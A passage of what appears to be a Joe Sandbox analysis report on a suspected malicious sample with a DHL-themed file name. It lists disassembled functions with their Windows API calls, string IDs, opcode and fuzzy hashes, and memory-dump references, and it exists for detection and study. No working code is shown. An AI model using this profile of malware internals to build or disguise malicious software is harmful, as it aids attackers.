                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                      • String ID: @
                                                                                      • API String ID: 2783356886-2766056989
                                                                                      • Opcode ID: 8269c56087a6ef3750c93927d71eb02a90f125cfb3a0e235db23b44436002628
                                                                                      • Instruction ID: d40da941cd1fa1931a34502283d656a13007f71f25524e8682d1c4fea429c9a7
                                                                                      • Opcode Fuzzy Hash: 8269c56087a6ef3750c93927d71eb02a90f125cfb3a0e235db23b44436002628
                                                                                      • Instruction Fuzzy Hash: 5A5127715087489BE321AF10D886BAFBBFCFB84700F81885DF1D991196EB718529CB66
                                                                                      Function 000B5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 000B57E0
                                                                                      • _wcslen.LIBCMT ref: 000B57EC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharUpper_wcslen
                                                                                      • String ID: CALLARGARRAY
                                                                                      • API String ID: 157775604-1150593374
                                                                                      • Opcode ID: 84126294b83056837ca3709996f9444e0a9e5c0b8f1915df457201de8f732375
                                                                                      • Instruction ID: b9ee05086f92897da7b830e2bf3258059170e5dec463b456a873347ff041998c
                                                                                      • Opcode Fuzzy Hash: 84126294b83056837ca3709996f9444e0a9e5c0b8f1915df457201de8f732375
                                                                                      • Instruction Fuzzy Hash: 1941A071A001099FCB14DFA9C881AFEBBF5FF59321F244069E505B7252EB749D81CB90
                                                                                      Function 000AD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 000AD130
                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 000AD13A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CrackInternet_wcslen
                                                                                      • String ID: |
                                                                                      • API String ID: 596671847-2343686810
                                                                                      • Opcode ID: 123e5246756b3849bbc5950884a6a3f513d05a1794bb89be304ec93c51ce6dfc
                                                                                      • Instruction ID: 7af26448b20abec4088fb160bd28366b322b9231e43e54f01ee38be369d513f9
                                                                                      • Opcode Fuzzy Hash: 123e5246756b3849bbc5950884a6a3f513d05a1794bb89be304ec93c51ce6dfc
                                                                                      • Instruction Fuzzy Hash: CF310C71D00219BBDF15EFA4CC85AEEBFB9FF09300F10401AF815A6166DB35AA56DB60
                                                                                      Function 000C356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 000C3621
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 000C365C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$DestroyMove
                                                                                      • String ID: static
                                                                                      • API String ID: 2139405536-2160076837
                                                                                      • Opcode ID: bd974f8354f0e37be6d32d0abe315338a9f378c64023a40859993e465a6b4171
                                                                                      • Instruction ID: 83b8ac3532a5aeb1a8681e877b2491e899eb91538e3007cb62ea7d52bc67b449
                                                                                      • Opcode Fuzzy Hash: bd974f8354f0e37be6d32d0abe315338a9f378c64023a40859993e465a6b4171
                                                                                      • Instruction Fuzzy Hash: D8318C71110604AAEB149F68DC81FFF73A9FF88720F00D61DF9A997291DA35AD81DB60
                                                                                      Function 000497C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                        • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                                                                      • GetParent.USER32(?), ref: 000873A3
                                                                                      • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 0008742D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$ParentProc
                                                                                      • String ID: p]
                                                                                      • API String ID: 2181805148-1923361398
                                                                                      • Opcode ID: 570ca7c9010b92ccdb0b4832cab63b64220c9c75f9d630836a94a97eb2bcfcb5
                                                                                      • Instruction ID: 2eeb162618782e77c11e5e41203b6fb16e383eba80f6558e9bbc291a14ecc6af
                                                                                      • Opcode Fuzzy Hash: 570ca7c9010b92ccdb0b4832cab63b64220c9c75f9d630836a94a97eb2bcfcb5
                                                                                      • Instruction Fuzzy Hash: 3421D070604104AFCB21AF2CC848DEA3BD1EF46364F1402B9F9A95B2A2C7718E51E744
                                                                                      Function 000C31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000C327C
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C3287
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: Combobox
                                                                                      • API String ID: 3850602802-2096851135
                                                                                      • Opcode ID: 31b02444ded581ba7830288edb353368667840e42cda744f7838bc0c4d184a92
                                                                                      • Instruction ID: a85c1a73ac304b909e9760f2f58543f69bfc76a09c1a887cb7401dc2f09577ae
                                                                                      • Opcode Fuzzy Hash: 31b02444ded581ba7830288edb353368667840e42cda744f7838bc0c4d184a92
                                                                                      • Instruction Fuzzy Hash: 7111D0712102087FFF659F54DC81FBF37AEEB98364F108129F91897290D6719D518760
                                                                                      Function 0009EF10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: HANDLE$`
                                                                                      • API String ID: 176396367-1948523916
                                                                                      • Opcode ID: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
                                                                                      • Instruction ID: 6a380fd4a750b9a5bdd07a3cbe4e96faea266bbeee26e5066762e655413e1451
                                                                                      • Opcode Fuzzy Hash: 48deb52f5dcb1a1ec2d68bc8dc9d77364c80f45fa2f2292cbd0477775692746a
                                                                                      • Instruction Fuzzy Hash: 30110072520198DAEF28CF14D899BBDB3E8EF80766F60407BE405CE0C4FB709E81A614
                                                                                      Function 000C32A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateMenuPopup
                                                                                      • String ID: p]
                                                                                      • API String ID: 3826294624-1923361398
                                                                                      • Opcode ID: 3a40f77a0fedc5a3bd0b0db8fd41db82f468d8408ac99c7b7ae851b637dc95d0
                                                                                      • Instruction ID: 6330cffe8169eb9095d17e2bb161f137228bc40f7e87cd2def70bc925b12d767
                                                                                      • Opcode Fuzzy Hash: 3a40f77a0fedc5a3bd0b0db8fd41db82f468d8408ac99c7b7ae851b637dc95d0
                                                                                      • Instruction Fuzzy Hash: CB214834608604AFDB61CF28C445FDABBE5FB0A365F08806EE8999B351D331AE42CF51
                                                                                      Function 000C3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0003600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
                                                                                        • Part of subcall function 0003600E: GetStockObject.GDI32(00000011), ref: 00036060
                                                                                        • Part of subcall function 0003600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 000C377A
                                                                                      • GetSysColor.USER32(00000012), ref: 000C3794
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                      • String ID: static
                                                                                      • API String ID: 1983116058-2160076837
                                                                                      • Opcode ID: abf9131f3e0fdff12ca912671cab7f62f7493b354140f546fb089c2a54c6bec4
                                                                                      • Instruction ID: 0296f7399c0d75493d78f497b1b87ac7fbf57e18e6f41e88972dea700155053f
                                                                                      • Opcode Fuzzy Hash: abf9131f3e0fdff12ca912671cab7f62f7493b354140f546fb089c2a54c6bec4
                                                                                      • Instruction Fuzzy Hash: CA1129B2610209AFEB11DFA8CC46EEE7BF8FB08314F008619F955E2250D775E9519B50
                                                                                      Function 000C6181 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000C61FC
                                                                                      • SendMessageW.USER32(?,00000194,00000000,00000000), ref: 000C6225
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: p]
                                                                                      • API String ID: 3850602802-1923361398
                                                                                      • Opcode ID: 60dbd06919121168a68c5adb5992daf057fea6f2b884fb90df88ee0c20a6a53d
                                                                                      • Instruction ID: fd7376cd5fe5e6e7a5f0d4eaaef27780c3a86488c11cc761abddb0caf715f126
                                                                                      • Opcode Fuzzy Hash: 60dbd06919121168a68c5adb5992daf057fea6f2b884fb90df88ee0c20a6a53d
                                                                                      • Instruction Fuzzy Hash: 8611C471144614BEEB318F68CD15FFD3BE8EB06315F044119FA169A1E1D3B6DA00DB50
                                                                                      Function 000ACD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000ACD7D
                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000ACDA6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$OpenOption
                                                                                      • String ID: <local>
                                                                                      • API String ID: 942729171-4266983199
                                                                                      • Opcode ID: 3c6e2a43c4da2c98a335d7adbe14452d02315600fb119ef7060be55b7f53b71c
                                                                                      • Instruction ID: edfb406784d3fe2f34ed96261c8450776eb7f4704b909bee274fd1c073034463
                                                                                      • Opcode Fuzzy Hash: 3c6e2a43c4da2c98a335d7adbe14452d02315600fb119ef7060be55b7f53b71c
                                                                                      • Instruction Fuzzy Hash: 0911CE71205636BAF7784BA68C89EF7BEACEF137A4F01422AB11987180D7749840D6F0
                                                                                      Function 000C3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 000C34AB
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 000C34BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                      • String ID: edit
                                                                                      • API String ID: 2978978980-2167791130
                                                                                      • Opcode ID: b124ab85a0b504ac2a505de6131e22bff64f8b94b9f9b86f5125f791e2522308
                                                                                      • Instruction ID: 4f606b4f0fcfeba1c65d37d6421f22c3a8b3ee7adb547bda80beec2eae3dd946
                                                                                      • Opcode Fuzzy Hash: b124ab85a0b504ac2a505de6131e22bff64f8b94b9f9b86f5125f791e2522308
                                                                                      • Instruction Fuzzy Hash: B211BC71110208ABEB668F64DC84FEF37AAEB05374F508328FA64931E0C775EC919B60
                                                                                      Function 000C4F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,?,?,?), ref: 000C4FCC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: p]
                                                                                      • API String ID: 3850602802-1923361398
                                                                                      • Opcode ID: 7c7a9a8185f07590b35f8dabd9c5407daa212ae5044ff59097d46ae73b8f8171
                                                                                      • Instruction ID: 9eacc7426c48c3d5374c6fcffae2aac19cd1d32d238c22ef1b4fcc6dd2bf649c
                                                                                      • Opcode Fuzzy Hash: 7c7a9a8185f07590b35f8dabd9c5407daa212ae5044ff59097d46ae73b8f8171
                                                                                      • Instruction Fuzzy Hash: 4C21D07AA0011AEFDB15CFA8C950DEE7BB9FB4D340B104158FA05A7320D731E961EBA0
                                                                                      Function 00096C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00096CB6
                                                                                      • _wcslen.LIBCMT ref: 00096CC2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: STOP
                                                                                      • API String ID: 1256254125-2411985666
                                                                                      • Opcode ID: de77d74c7984bc6aca7a07eef5bb411ca5111e8623c4479b01f10ca866db0105
                                                                                      • Instruction ID: 3b27576b14f78e0f7ea44391f1608fb3c9943448e4be2b3b7cbb4f61e83f0724
                                                                                      • Opcode Fuzzy Hash: de77d74c7984bc6aca7a07eef5bb411ca5111e8623c4479b01f10ca866db0105
                                                                                      • Instruction Fuzzy Hash: 5701C032A145268ACF21AFBDDC819BF77E9EB61710B510538F86296191EA32E940E650
                                                                                      Function 000490DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p]
                                                                                      • API String ID: 0-1923361398
                                                                                      • Opcode ID: 040ae19cebc0dd5caf92899468f7c9b7cdcf338b2f4bb8147dcaa749bf4a1b12
                                                                                      • Instruction ID: e946a91079054f5af61beaba6b22d80042b687e9fded2fddffe453071d984062
                                                                                      • Opcode Fuzzy Hash: 040ae19cebc0dd5caf92899468f7c9b7cdcf338b2f4bb8147dcaa749bf4a1b12
                                                                                      • Instruction Fuzzy Hash: 12113D35604604EFDB20DF19D850EA5B7E6FB89320F248269F9698B2A0C771E981CF90
                                                                                      Function 00091CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00091D4C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 48f218fa25d449ed4532bfbc120b3dc4965ff7e1b18355c8f16e913e09ca4b1c
                                                                                      • Instruction ID: c5d131cb4e1bd06b404a3620ea32c8502a6d0760f134e6c88d4b5b614eeca96a
                                                                                      • Opcode Fuzzy Hash: 48f218fa25d449ed4532bfbc120b3dc4965ff7e1b18355c8f16e913e09ca4b1c
                                                                                      • Instruction Fuzzy Hash: E901D471702219AB8F19EBA4CD55CFE77A8EF46390F040619F922672D2EA705908E760
                                                                                      Function 00091BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00091C46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
